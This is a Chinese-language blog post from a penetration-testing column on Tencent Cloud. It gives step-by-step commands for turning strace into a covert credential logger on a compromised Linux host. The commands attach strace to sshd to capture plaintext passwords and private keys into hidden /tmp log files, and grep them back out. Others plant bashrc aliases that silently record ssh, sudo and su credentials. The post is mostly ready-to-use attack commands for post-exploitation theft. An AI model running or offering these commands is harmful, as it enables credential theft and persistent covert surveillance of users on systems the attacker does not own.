前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >制作linux键盘记录后门

制作linux键盘记录后门

作者头像
drunk_kk
发布2021-03-23 15:26:50
3.4K0
发布2021-03-23 15:26:50
举报
文章被收录于专栏:渗透测试教程

愿中国青年都摆脱冷气,只是向上走, 不必听自暴自弃者流的话。能做事的做事,能发声的发声。有一分热,发一分光。—鲁迅

介绍

strace是一个动态跟踪工具,它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围

使用场景

通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。我们想要获取当前主机的密码,或者通过这台主机连接到其他主机的密码。

记录sshd进程明文密码

执行如下命令

代码语言:javascript
复制
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)、

当用户通过密码登录时,使用如下命令查看记录的密码

代码语言:javascript
复制
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

记录sshd私钥

代码语言:javascript
复制
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)

当用户通过私钥登录时,使用如下命令查看记录的私钥

代码语言:javascript
复制
grep 'PRIVATE KEY' /tmp/.sshd.log

记录ssh的登录凭证

我们还可以记录本机执行ssh、su等命令,这里以ssh为例

  1. 修改alias
代码语言:javascript
复制
# 添加命令
vi ~/.bashrc或者/etc/bashrc
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
# 立即生效
source ~/.bashrc
  1. 执行 ssh 10.xx.xx.148 -l mysql

会在 /tmp/ 目录下多个log

读取log中记录的密码

grep -A 9 'password' .ssh-202月021613809979.log

记录sudo、su的alias

代码语言:javascript
复制
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 32 sudo'
alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 32 su'
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-02-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透测试教程 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 介绍
  • 使用场景
  • 记录sshd进程明文密码
  • 记录sshd私钥
    • 记录ssh的登录凭证
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档